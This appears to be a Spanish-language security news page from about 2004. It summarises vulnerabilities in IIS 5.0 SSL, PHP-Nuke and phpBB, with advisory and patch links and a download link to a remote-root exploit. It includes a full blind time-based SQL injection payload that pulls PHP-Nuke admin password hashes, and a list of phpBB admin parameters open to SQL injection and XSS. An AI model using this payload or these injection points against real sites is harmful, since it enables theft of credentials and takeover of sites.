Exploit para IIS 5.0 (root remoto)
"SSL Vulnerability - CAN-2004-0120" se ha publicado un expliot sobre esta vulnerabilidad que permite acceder remotamente como root en sistema con IIS 5.0. Descargar Exploit
Vulnerabilidades
"SSL Vulnerability - CAN-2004-0120" se ha publicado un expliot sobre esta vulnerabilidad que permite acceder remotamente como root en sistema con IIS 5.0. Descargar Exploit
XSS & multiple SQL Injection en PHP-Nuke 6.x y 7.x
Se han descubierto tres nuevas fallas en PHP-Nuke, la solucion y enlaces a los correspondientes advisories los he colocado aqui.[ Admin-level authentication bypass in phpnuke 6.x-7.2]
Esta es la mas peligrosa para todas las web :S
http://www.securityfocus.com/archive/1/360136
[ User-level authentication bypass in phpnuke 6.x-7.2 ]
http://www.securityfocus.com/archive/1/360129
[ Cross-Site Scripting aka XSS in phpnuke 6.x-7.2 part 3 ]
http://www.securityfocus.com/archive/1/360156
Parches:
http://www.phpnuke.org/modules.php?name=News&file=article&sid=6679
Extraido de RZW
PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection Vulnerability
Nuevo vulnerabilidades publicada en Secuityfocus sobre Phpnuke que permite injection sql.Exploit:
"http://www.example.com/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)/*"
Para mas Info: Securityfocus
phpBB Multiple Input Validation Vulnerabilities
Multiples vulnerabilidades estas sacudiendo phpbb en estos ultimos dias, entre ellas, esta que permite realizar injection sqp y ataques XXS:Exploit
admin_smilies.php?mode=edit&id=[SQL]
admin_smilies.php?mode=delete&id=[SQL]
admin_smilies.php?mode=edit&id=[XSS]
admin_smilies.php?mode=delete&id=[XSS]
admin_styles.php?mode=edit&style_id=[SQL]
admin_styles.php?mode=delete&style_id=[SQL]
admin_styles.php?mode=edit&style_id=[XSS]
admin_styles.php?mode=delete&style_id=[XSS]
Para mas Info: Securityfocus